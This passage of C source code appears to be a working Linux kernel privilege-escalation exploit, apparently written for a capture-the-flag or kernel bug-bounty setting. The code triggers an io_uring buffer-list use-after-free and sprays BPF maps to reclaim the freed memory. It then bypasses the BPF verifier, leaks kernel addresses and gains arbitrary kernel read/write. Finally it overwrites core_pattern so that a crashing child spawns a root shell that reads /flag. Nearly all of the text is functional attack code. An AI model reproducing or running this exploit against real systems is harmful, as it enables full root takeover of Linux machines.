        .len = 1,
    };

    // SQE 1: The vulnerable IORING_OP_READV operation
    // IOSQE_BUFFER_SELECT is crucial as it uses the registered buffer ring.
    // IOSQE_IO_HARDLINK ensures the operation stays pending until explicitly completed.
    // buf_group is set to a specific ID (0x800) to target a specific `io_buffer_list`.
    struct iovec iov = {.iov_len = 0x1000};
    sqes[1] = (struct io_uring_sqe){
        .opcode = IORING_OP_READV,
        .flags = IOSQE_FIXED_FILE | IOSQE_BUFFER_SELECT | IOSQE_IO_HARDLINK,
        .fd = 0, // Using registered fixed dummy file descriptor (not part of the exploit).
        .addr = (size_t)&iov,
        .len = 1,
        .buf_group = 0x800, // This targets the `io_buffer_list` with bgid 0x800
    };

    // Submit the two SQEs to io_uring
    ((int *)(sq_ring + params->sq_off.array))[0] = 0; // Index of SQE 0
    ((int *)(sq_ring + params->sq_off.array))[1] = 1; // Index of SQE 1
    (*(int *)(sq_ring + params->sq_off.tail)) += 2; // Increment tail to signal new entries

    SYSCHK(syscall(SYS_io_uring_enter, uring_fd, 2, 0, 0, NULL, 0));

    // After submission, the `io_buffer_list` for bgid 0x800 is "prepared" but its
    // refcount is not incremented. We now unregister (free) a range of these buffers
    // so the freed objects can later cross cache.
    // This creates the UAF condition for the `io_buffer_list` at bgid 0x800.
    for (int i = 0x400; i < 0xc00; i++) { // Range that includes 0x800
        struct io_uring_buf_reg unreg_ring = {.bgid = i};
        SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg_ring, 1));
    }
}

// @step(name="Heap Grooming and Cross-Cache Attack")
// Sprays BPF_MAP_TYPE_ARRAY to reclaim the memory of the freed `io_buffer_list` objects.
// This allows the UAF increment to hit a controlled BPF map object.
// Objects sprayed: bpf_array  (size:8192)
static void spray_cross_cache_bpf_maps(int *bpf_map_fd, int (*prog_bpf_fds)[2]) {
    // Create many BPF array maps to reclaim the freed memory.
    // NOTE(review): `io_buffer_list` lives in kmalloc-64, while the header above
    // says the sprayed bpf_array is ~8192 bytes — the reclaim is cross-cache
    // (via pages returned to the page allocator), not same-slab; confirm against
    // the unregister loop in vuln_trigger_io_uring_uaf().
    // BPF_F_MMAPABLE: Allows userspace to mmap the map's value for direct access.
    // BPF_F_RDONLY_PROG: Crucial for the BPF verifier bypass. It makes the verifier assume
    // the map contents are read-only, allowing us to later modify them via UAF.
    for (int i = 0; i < 0x200; i++) { // Spray 0x200 maps
        bpf_map_fd[i] = SYSCHK(setup_bpf_create_mmapable_map(BPF_MAP_TYPE_ARRAY, 4, 0x1000, 1, 0));
    }

    // Freeze all the created BPF maps, then load one leak program and one
    // read/write program per map (each map is dup2'd to FD 0x100 first, which
    // is the FD the BPF programs reference via BPF_LD_MAP_FD).
    for (int i = 0; i < 0x200; i++) {
        util_bpf_map_freeze(bpf_map_fd[i]);
        SYSCHK(dup2(bpf_map_fd[i], 0x100)); // Duplicate map FD to 0x100 for BPF program access
        prog_bpf_fds[i][0] = load_leak_bpf_prog(); // Load the leak program
        prog_bpf_fds[i][1] = load_read_write_bpf_prog(); // Load the read/write program
    }
}

// Exploit entry point. Runs in two modes:
//  - argc == 1: the exploit proper (triggers the io_uring UAF, leaks a kernel
//    address via BPF, builds an arbitrary R/W primitive, and overwrites
//    core_pattern).
//  - argc > 1: re-executed by the kernel as the core_pattern pipe handler
//    (with root privileges) when the groomed child crashes; argv[1] is the
//    crashing PID (%P).
int main(int argc, char **argv) {
    setvbuf(stdout, 0, _IONBF, 0); // Unbuffered output so progress survives a crash

    // @step(name="Setup Environment")
    // Raise the FD limit: the spray stage needs ~0x200 map FDs plus two BPF
    // program FDs per map, well beyond the default soft limit.
    struct rlimit rlim = {
        .rlim_cur = 0x1000,
        .rlim_max = 0x1000};
    SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));
    SYSCHK(dup2(0, 0x100)); // Reserve FD 0x100; later repointed at BPF map FDs.

    // Child process for root shell execution via core_pattern
    if (argc > 1) {
        // This block is executed by the root pipe-handler instance.
        // Steal the crashed (exploit) process's stdio so the shell is usable.
        int pid = strtoull(argv[1], 0, 10);
        int pfd = syscall(SYS_pidfd_open, pid, 0);
        int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
        int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
        int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
        dup2(stdinfd, 0);
        dup2(stdoutfd, 1);
        dup2(stderrfd, 2);
        // Execute the root shell commands.
        system("cat /flag;echo o>/proc/sysrq-trigger"); // Read flag and potentially trigger OOM for cleanup
        // Varargs sentinel must be a null POINTER, not a bare NULL macro
        // (which may expand to plain 0 on some platforms).
        execlp("bash", "bash", (char *)NULL);
        perror("execlp bash"); // Only reached if exec fails
        exit(1);
    }

    // Parent process (main exploit logic)
    int child_pid = fork();
    if (child_pid == 0) { // First child process, will trigger core dump later
        setup_cpu_affinity(0); // Pin to CPU 0
        setsid(); // Create a new session (important for init namespace root)
        exploit_trigger_core_dump(""); // Check core dump and will trigger crash later
        exit(0);
    }
    setup_cpu_affinity(1); // Pin main exploit process to CPU 1

    // Create a generic array map, dup2'd to 0x101. This map will be used by BPF programs
    // for passing data (kernel addresses, read/write values) between userspace and kernel.
    int output_array_map_fd = setup_bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x10, 0);
    SYSCHK(dup2(output_array_map_fd, 0x101));

    // Retry loop: each attempt runs in a fresh child pinned to CPU 0. If an
    // attempt fails (child exits), the parent forks a new child and retries.
    for (int i = 0;; i++) {
        printf("Try #%d round\n", i);
        setup_cpu_affinity(0); // Child uses CPU 0 for io_uring trigger
        if (fork() == 0)
            break; // Child continues
        wait(0); // Parent waits for child to finish
    }

    // --- io_uring Setup ---
    int pipe_fd[2];
    SYSCHK(pipe(pipe_fd)); // Pipe for io_uring operations

    struct io_uring_params params = {};
    // Setup io_uring with a reasonable number of entries (e.g., 0x8000)
    int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, 0x8000, &params));

    // Mmap io_uring rings (submission queue, completion queue, SQEs)
    unsigned char *sq_ring = SYSCHK(mmap(NULL, params.sq_off.array + params.sq_entries * sizeof(unsigned),
                                         PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
    unsigned char *cq_ring = SYSCHK(mmap(NULL, params.cq_off.cqes + params.cq_entries * sizeof(struct io_uring_cqe),
                                         PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
    struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, params.sq_entries * sizeof(struct io_uring_sqe),
                                            PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));

    // Register a dummy file descriptor for io_uring operations
    int dummy_fd = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
    SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_FILES, &dummy_fd, 1));

    // Mmap a buffer and an io_uring_buf_ring structure.
    // `res_buffer` will be the actual data buffer, and `ring_buffer` is the metadata.
    char *res_buffer = SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0));
    struct io_uring_buf_ring *ring_buffer = SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0));

    // @step(name="io_uring Use-After-Free Vulnerability prepare")
    vuln_setup_io_uring_buffer_ring(uring_fd, res_buffer, ring_buffer);

    // @step(name="io_uring Use-After-Free Vulnerability trigger")
    // Trigger the actual UAF by submitting vulnerable operations and unregistering.
    vuln_trigger_io_uring_uaf(uring_fd, pipe_fd[0], sq_ring, sqes, &params);

    // Give some time for kernel internal structures to settle (heuristic)
    sleep(5);

    // @step(name="Heap Grooming and Cross-Cache Attack")
    // Use an array to store BPF map FDs.
    int bpf_map_fd[0x200];
    // Array to store program FDs (leak_prog_fd, rw_prog_fd) for each map
    int prog_bpf_fds[0x200][2];
    spray_cross_cache_bpf_maps(bpf_map_fd, prog_bpf_fds);

    // Write a byte to the pipe to complete the first io_uring operation,
    // which allows the linked vulnerable IORING_OP_READV to finish and trigger UAF.
    SYSCHK(write(pipe_fd[1], tmp_buf, 1));
    // Wait for completion events to ensure the UAF is triggered.
    SYSCHK(syscall(SYS_io_uring_enter, uring_fd, 0, 2, IORING_ENTER_GETEVENTS, NULL, 0));

    // @step(name="BPF Verifier Bypass and Kernel Address Leak")
    int exploit_success = 0;
    int kernel_read_write_prog_fd = -1; // Store the FD of the successful R/W program

    // Iterate through sprayed BPF maps to find the one corrupted by the UAF.
    for (int j = 0; j < 0x200; j++) {
        char *mmaped_addr = SYSCHK(mmap(0, 0x1000, PROT_READ, MAP_SHARED, bpf_map_fd[j], 0));
        // A frozen, untouched map still holds the expected `magic` pattern;
        // any deviation means the UAF increment landed in this map.
        if (memcmp(mmaped_addr, magic, 0x1000) != 0) {
            // Found the corrupted map!
            int array_map_leak_prog_fd = prog_bpf_fds[j][0];
            kernel_read_write_prog_fd = prog_bpf_fds[j][1];

            // Attach the leak BPF program to a socket to trigger its execution
            SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets));
            SYSCHK(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &array_map_leak_prog_fd,
                               sizeof(array_map_leak_prog_fd)));
            exploit_success = 1;
            break;
        }
        SYSCHK(munmap(mmaped_addr, 0x1000)); // Unmap if not the target
    }

    if (exploit_success == 0) {
        puts("Failed to find corrupted BPF map. Exiting.");
        exit(0);
    }

    size_t array_map_kernel_addr = 0;
    // Loop until we successfully leak the kernel address of an array map.
    // The BPF program will store this in BPF map element 1 of output_array_map_fd.
LOOP_LEAK:
    for (int i = 0; i < 0x100; i += 8) {
        // Trigger the leak program by sending a byte over the socket
        *(size_t *)(&tmp_buf[8]) = i; // Offset parameter passed to the leak program
        SYSCHK(write(sockets[0], tmp_buf, 9));
        array_map_kernel_addr = util_get_elem(0x101, 1); // Get the leaked address
        if (array_map_kernel_addr) {
            break;
        }
    }
    if (array_map_kernel_addr == 0) {
        goto LOOP_LEAK; // Retry if leak failed
    }
    printf("Leaked array_map kernel address: 0x%lx\n", array_map_kernel_addr);

    // @step(name="Arbitrary Kernel Read/Write Primitive")
    // Detach the leak program and attach the arbitrary read/write program.
    SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)); // New socket pair for the R/W primitive
    SYSCHK(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &kernel_read_write_prog_fd,
                       sizeof(kernel_read_write_prog_fd)));

    // Calculate kernel base address using the leaked array_map address and a known offset.
    size_t kernel_base = leak_kernel_read64(array_map_kernel_addr) - ARRAY_MAP_OPS_OFFSET;
    printf("Calculated kernel base address: 0x%lx\n", kernel_base);

    // Calculate the address of `core_pattern` in kernel memory.
    size_t core_pattern_addr = kernel_base + CORE_PATTERN_OFFSET;
    printf("core_pattern address: 0x%lx\n", core_pattern_addr);

    // @step(name="Privilege Escalation")
    // Overwrite `core_pattern` with our payload to gain root.
    // The payload `|/proc/%P/fd/666 %P` tells the kernel to execute
    // the program pointed to by FD 666 (our exploit binary) with root privileges
    // when a process crashes, passing the PID as an argument.
    //
    // The array is padded to 24 bytes (a multiple of sizeof(size_t)): the
    // copy loop below reads 8 bytes per iteration, and with the natural size
    // (20) the final read would run 4 bytes past the end of the array
    // (out-of-bounds read, undefined behavior). The zero-initialized padding
    // is written to core_pattern and simply NUL-terminates the string.
    char core_pattern_payload[24] = "|/proc/%P/fd/666 %P";
    // Write the payload to core_pattern, 8 bytes at a time.
    for (int i = 0; i < sizeof(core_pattern_payload); i += sizeof(size_t)) {
        exploit_kernel_write64(core_pattern_addr + i, *(size_t *)(core_pattern_payload + i));
    }
    puts("core_pattern overwritten.");

    // The child process for core dump (created earlier) will now crash.
    // When it crashes, the kernel will execute this exploit binary (via FD 666)
    // with root privileges. The arguments will be the PID of the crashed process.
    // The main function's initial `if (argc > 1)` block handles this.

    // Keep the main process alive to allow the child to call `execve`.
    // It will eventually exit when the shell takes over.
    pause();

    return 0;
}
